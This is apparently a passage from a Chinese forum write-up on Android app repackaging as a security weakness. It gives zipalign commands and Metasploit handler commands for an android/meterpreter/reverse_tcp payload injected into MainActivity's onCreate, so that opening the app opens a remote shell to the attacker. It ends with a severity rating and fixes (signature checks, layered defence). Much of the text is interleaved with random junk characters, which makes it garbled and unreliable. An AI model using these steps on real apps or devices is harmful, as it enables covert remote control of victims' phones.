1 A5 G1 w! y+ ~/ W w/ I o) Y7 s8 w3 p4 R9 ~+ k: _ 字节对齐优化 $ n t \6 l5 z$ y * l. `* H4 Z- f0 s/ ]

4 r0 `$ ^8 ]% h' f : f9 l2 P" @. V7 p7 O* d zipalign -v 4 repackaged.apk final.apk " E. {8 s- D$ `" l f) B& M5 R5 f& R/ m4 ?8 x3 Z' K! k6 I8 L( d

8 C) ^) |0 O% x$ R) p# D; i+ p. O6 j% h: S% D# E 检查是否对齐 2 F. ?0 _: J3 h * J9 ~: o: O' \$ c9 T2 u' s

0 R9 H, p% a% @; T 2 Q2 h6 Q5 m) a2 _- t# I% z% v zipalign -c -v 4 final.apk ?) U: S6 A0 z; m7 N6 A2 K5 j # ~. m& Y2 j# T( l6 U

, ^ S. g0 @" U. ~! E5 i, q . c- v% t9 Q5 Q9 w8 W 注：zipalign可以在V1签名后执行，但zipalign不能在V2签名后执行,只能在V2签名之前执行 4 u% I, ]6 b w. R: q. U) B3 W2 ]- G

0 R8 W7 d( _" W) w2 Y8 k1 q: i 8 j- U, d3 v! q0 s/ b9 r 启动Metasploit控制台，配置参数等待上线 ; S( T5 p( s+ C9 ]+ f$ d+ F( Z& t/ B! e, \5 [" ]

" j' {6 g: y3 X) ]7 t9 [7 @ : g# K: e$ B* ?. o. a: z 在终端依次输入如下命令 % q w/ x- i/ R, y& ?7 w & C3 }2 M0 P5 |7 {

. Q, s* [, l$ {! J( l) Y% _ + t$ f- P" j% r9 i" y& m( t# u( S9 ]( y msfconsole 4 V( x- F3 [3 l2 K9 C- L* u , m/ j4 \) b3 ~& z' l( I! U

7 q# z. w1 o) u ! \0 k m0 x# @ use exploit/multi/handler 9 Q9 C7 i, C4 @6 `6 D5 r , u) C5 V" N- ~

& i7 x% B4 H' u8 n R . v1 n8 S& i% T# B set PAYLOAD android/meterpreter/reverse_tcp 5 X$ i" d l: Z* i2 P- ~ - n3 G% `/ q- K- I2 O1 m& r

7 k/ w8 {, @/ F( B, L, n1 K & a2 y K* i- `1 Q1 E set LHOST 192.xxx.xx.xx / ]: d6 I* |: J# Y% b. M# {$ G4 _+ a9 H6 t( O9 J

! ~7 H& Q( H9 a8 _9 ? # M! s' W2 A! ^6 D6 L set LPORT 4444 0 f) |0 \) p% w6 Z2 w6 q' Y2 @$ I; w

/ D9 V( u' Q) ~" u - U% u6 d$ N( P4 Y" a3 ` exploit , [' W! K+ y# f+ T7 V 1 P6 b1 f3 l R7 X: p; I

0 e1 s5 F5 s$ I# M, R 2 n; C2 x& A/ E* E) { M 之前我们把入口放在 MainActivity 的 onCreate 方法中，当启动目标应用进入该界面，就会连接成功，如下图： * |0 r# {" b8 Y8 u& J* ~$ Y" v % y2 G6 O/ Q5 \8 H% D

! _7 y# S+ b6 [( B" i5 n ! F, H" d) b8 J ^' L 漏洞危害：中 : }/ R% y) g, V 9 u* l/ O: k. k, w' p5 [; n( E

: }. S6 l5 F& n8 t& d/ e+ c/ B 4 v1 s. f @3 y- q1 u * C$ i1 B+ R, w+ }: _/ i& Q( W. C$ n# ^' ? 严重程度 & z M0 i8 ~# c! c) J" q# J# X. E* V , y0 y. W5 Y$ ?1 a" _- H : \|0 g6 t: l7 E : @& O3 G6 x/ P	5 ?6 x; l; s5 ?! J1 r: u! n 3 W0 J2 l, L3 y( D! B 3 L5 e, Y8 h. \# `& h 8 B3 x% @% y- \1 q w 高 # X/ f+ ]7 v0 u3 g% C b( g 3 b3 w. j8 d3 E2 C3 F: N / u" b8 o7 S- r : S8 g+ j" w& ~; W2 U	" d0 k: [: h2 K5 d7 \| % l- f9 R) e n; h! k( ~. q5 r) r 9 ~' Y7 x+ s! F: S, H: A ) [, H1 M1 q( o L+ R4 F* W ■ # b5 O" h0 Q, T5 G0 A* g0 b " E" I9 ?+ c" O/ M/ ?* k5 m K ) o+ J+ X0 ?0 u( f# @ 6 u+ L' J6 r7 Q F	7 t3 d) ]2 C. A8 B9 l& a r3 B 6 s1 J( d: U4 ` ' A1 V' v2 q0 C0 h2 b7 H9 h {% g4 R0 \|1 ] 中 * `5 a3 p* H5 {1 l) @. ^$ O ) t+ _: S! S$ h# B, F& m: t . B! N5 \|0 {* P2 I- f% I 4 g) {0 I* i! A3 f	% G2 G* u0 d' a+ O7 r4 L0 b$ z * b& F1 Q) c; h4 X& C, D! T% N 3 Z3 L% Q F8 Y* D/ ] ! k! c% o4 b5 \|6 \8 T 6 @- T2 G5 ]5 Q% \8 b' W, T0 h. b2 d B# u% { , H; i- f: g0 J1 U6 }1 o' B9 \| \- o! m# p" p/ ] % I- T" W [3 k+ V; M$ d' Q! {, e9 \* [5 [5 N% a3 O0 _; K0 Q	# w5 ]9 l* q+ ~0 v6 d2 j & H B0 a* F3 `8 f5 J 3 j" [) c8 {8 e7 I 8 p3 E0 w+ }/ C# z3 f 低 - Z' r, O; E; @6 ~% v5 w ) m) }$ ]0 p2 y; ?+ N, o1 a F " ~, t9 ?9 c* D$ R9 T0 Z . I/ Z5 j7 g# o	: V2 R' s2 [3 @- n7 m+ O6 v; ^' i t5 d' Q+ N0 t& N/ O; X" e1 Y * Z0 v7 T. Y- Q# u% P + I r' d4 v4 ]7 \|2 W* W 6 C ?8 c; i- H( r' \|+ D0 N / u' N* p0 }+ J ) G' F/ G3 d0 k' n) d: Z O1 F5 e+ V ! ~7 {3 f" O1 r, y& t' E& p; V 8 y" a! D( [4 K: Z

% F8 j6 F) X! [1 ~ 2 @* m0 s# Y$ u# A( G' G! I * K/ j5 F& G: l, j : G, A" L/ `, t% h+ e( f' m

; Q) E1 W: `4 F7 `! ] p , g S9 I2 G, A- r* A. z0 \$ W 修复方法： 2 t! C; A: f( N c+ r7 l$ O) D- P- ~/ ^2 Z6 F

# D v) {2 e9 N1 Y1 C& a6 G6 n1 P( R 9 y6 B I: P! ?. K( k0 D 1.在 APP 启动时应做签名校验防止二次打包。
1 s) z' V( K. g" S+ D2 E& |, Q1 g* s. g% c. k 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 # T$ ~7 M4 { t7 [4 M Q# t& e $ V3 T" v6 ], K6 ?! A

) V, ]* o2 t% ^* Y* {5 f S ! @2 H8 _+ m. D5 {' p 8 Q7 |* ]2 o1 M+ B$ X * j3 A& B; w0 S4 l1 C8 c% A- J

1 G# {- x- {; o+ ~0 w R; q ' P6 X) D. J. `, R3 n
' Y5 G( B8 B- o& y" O! d$ f2 K2 F4 G% g2 I2 z

		自动登录	找回密码
密码			立即注册